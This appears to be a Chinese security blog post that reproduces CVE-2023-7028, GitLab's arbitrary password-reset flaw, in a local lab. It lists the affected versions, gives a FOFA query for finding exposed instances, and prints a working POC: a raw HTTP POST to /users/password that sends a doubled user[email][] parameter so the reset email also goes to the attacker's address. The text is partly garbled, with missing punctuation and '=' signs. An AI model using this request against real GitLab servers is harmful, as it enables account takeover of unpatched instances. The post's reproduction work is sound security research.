高端科技产品网站建设,html音乐网页设计模板,WordPress文章ajax,天津网站开发建设免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
2024年1月11日Gitlab 官方披露 CVE-2023-7028GitLab 任意用户密码重置漏洞官方评级严重。攻击者可利用忘记密码功能构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新建议升级至最新版本若无法升级建议利用安全组功能设置Gitlab 仅对可信地址开放。
二漏洞影响版本
16.1 GitLab CE16.1.6 16.2 GitLab CE16.2.8 16.3 GitLab CE16.3.6 16.4 GitLab CE16.4.4 16.5 GitLab CE16.5.6 16.6 GitLab CE16.6.4 16.7 GitLab CE16.7.2 16.1 GitLab EE16.1.6 16.2 GitLab EE16.2.8 16.3 GitLab EE16.3.6 16.4 GitLab EE16.4.4 16.5 GitLab EE16.5.6 16.6 GitLab EE16.6.4 16.7 GitLab EE16.7.2
三网络空间测绘查询
fofa: appGitLab
四漏洞复现
由于此漏洞利用条件为需获取系统已有用户注册邮箱地址此次复现在本地搭建docker环境复现。 访问找回密码页面/users/password/new输入目标邮箱抓包 POC: user[email][]mubiaoemail.comuser[email][]attackeremail.com 构造数据包,注意authenticity_token字段每次是不同的
POST /users/password HTTP/1.1
Host: 192.168.200.130:9980
Content-Length: 175
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.200.130:9980
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: http://192.168.200.130:9980/users/password/new
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Cookie: preferred_languagezh_CN; 16.5.4-hide-alert-modaltrue; known_sign_inYlhGQWZqemF5Ri90bGh3WkZKdmQ0amtrSTVJdmtSTXRycWxQRjB3Tm1aTDczTnpmaGVLY1JPanZEdENQV3FRNmVsS3FWOG5YQzJIK2tpMytwMVV4MnZ1YlhUZFZzK2xHVVZ6TlAxWlJicjBDdmovdWpXVng1RzBYMlVtbENHV0ktLUhqYnNYM2pDM3pOdk1wN2wraGJLNVE9PQ%3D%3D--0ca69ec494c505a0cfec65e71a8c2315e444fcff; _gitlab_session95c98f8c215016ce1c31bcd676c8c9d0
Connection: closeauthenticity_tokenXK1-wmJyvT2Jre1VEQ2ufEmR2GmsSju99_kJRgczjgIJArZH5yT2h44izgBfX0x0OW9VLtQbUz2yt9w--1wNaguser%5Bemail%5Dmubiao%40email.comuser%5Bemail%5Dattackeremail.com跟随重定向 可以看到提示如果两个邮箱都成功注册过那么攻击者邮箱将会收到目标用户的重置密码邮件